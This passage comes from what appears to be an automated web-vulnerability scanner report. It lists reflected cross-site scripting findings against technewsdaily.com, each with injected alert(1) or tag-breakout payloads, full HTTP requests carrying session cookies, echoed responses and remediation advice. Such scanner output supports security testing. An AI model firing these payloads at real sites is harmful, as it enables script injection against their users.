HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:05 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 65145
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... ipt"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/better-bomb-suits-could-protect-responders-from-explosions--1293/?8690d'-alert(1)-'3572f3edfc6=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9705f'-alert(1)-'2865218c61f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blackberry-playbook-tablet-to-launch-in-march-2011-18289705f'-alert(1)-'2865218c61f/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:53:18 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:53:18 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40508
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... ext/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/blackberry-playbook-tablet-to-launch-in-march-2011-18289705f'-alert(1)-'2865218c61f/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.28. http://www.technewsdaily.com/blackberry-playbook-tablet-to-launch-in-march-2011-1828/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17356'-alert(1)-'a171853f259 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blackberry-playbook-tablet-to-launch-in-march-2011-1828/?17356'-alert(1)-'a171853f259=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:53:13 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:53:13 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 62412
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... t/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/blackberry-playbook-tablet-to-launch-in-march-2011-1828/?17356'-alert(1)-'a171853f259=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.29. http://www.technewsdaily.com/blackberry-playbook-tablet-to-launch-in-march-2011-1828/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6788"><a>a0306c745ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blackberry-playbook-tablet-to-launch-in-march-2011-1828/?d6788"><a>a0306c745ca=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:53:01 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:53:01 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 62774
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/blackberry-playbook-tablet-to-launch-in-march-2011-1828/?d6788"><a>a0306c745ca=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e381c'-alert(1)-'f9be0c8bd02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blinded-satellite-gains-ground-in-radio-interference-battle--1420e381c'-alert(1)-'f9be0c8bd02/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:13 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40528
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... ript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/blinded-satellite-gains-ground-in-radio-interference-battle--1420e381c'-alert(1)-'f9be0c8bd02/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.31. http://www.technewsdaily.com/blinded-satellite-gains-ground-in-radio-interference-battle--1420/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b478c'-alert(1)-'178437e97d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blinded-satellite-gains-ground-in-radio-interference-battle--1420/?b478c'-alert(1)-'178437e97d6=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:00 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 67395
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... pt"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/blinded-satellite-gains-ground-in-radio-interference-battle--1420/?b478c'-alert(1)-'178437e97d6=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6cdc'-alert(1)-'6c6946204be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /change-of-heart-restore-deleted-gmail-contacts-1818b6cdc'-alert(1)-'6c6946204be/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:46 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:46 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40500
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... e="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/change-of-heart-restore-deleted-gmail-contacts-1818b6cdc'-alert(1)-'6c6946204be/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.33. http://www.technewsdaily.com/change-of-heart-restore-deleted-gmail-contacts-1818/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe6f"><a>0af34d1e8c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /change-of-heart-restore-deleted-gmail-contacts-1818/?dbe6f"><a>0af34d1e8c8=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:22 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63413
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/change-of-heart-restore-deleted-gmail-contacts-1818/?dbe6f"><a>0af34d1e8c8=1/" /> ...[SNIP]...
1.34. http://www.technewsdaily.com/change-of-heart-restore-deleted-gmail-contacts-1818/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74ba9'-alert(1)-'8a6eb7eb832 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /change-of-heart-restore-deleted-gmail-contacts-1818/?74ba9'-alert(1)-'8a6eb7eb832=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:35 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:35 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63051
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... "text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/change-of-heart-restore-deleted-gmail-contacts-1818/?74ba9'-alert(1)-'8a6eb7eb832=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b1a3'-alert(1)-'27bdaf75049 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contact-us3b1a3'-alert(1)-'27bdaf75049/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:18 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:19 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40418
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/contact-us3b1a3'-alert(1)-'27bdaf75049/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.36. http://www.technewsdaily.com/contact-us/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/contact-us/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19cc9'-alert(1)-'3473b765ee5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contact-us/?19cc9'-alert(1)-'3473b765ee5=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:11 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:11 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30447
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/contact-us/?19cc9'-alert(1)-'3473b765ee5=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b6ce'-alert(1)-'c1a22d88950 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /creative-releases-7-inch-android-tablet-for-270-18354b6ce'-alert(1)-'c1a22d88950/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:05 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:05 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40502
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... ="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/creative-releases-7-inch-android-tablet-for-270-18354b6ce'-alert(1)-'c1a22d88950/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.38. http://www.technewsdaily.com/creative-releases-7-inch-android-tablet-for-270-1835/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dfbc'-alert(1)-'df45b9d77de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /creative-releases-7-inch-android-tablet-for-270-1835/?5dfbc'-alert(1)-'df45b9d77de=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:51:59 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:51:59 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 61698
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/creative-releases-7-inch-android-tablet-for-270-1835/?5dfbc'-alert(1)-'df45b9d77de=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.39. http://www.technewsdaily.com/creative-releases-7-inch-android-tablet-for-270-1835/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12533"><a>fe2216afc2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /creative-releases-7-inch-android-tablet-for-270-1835/?12533"><a>fe2216afc2c=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
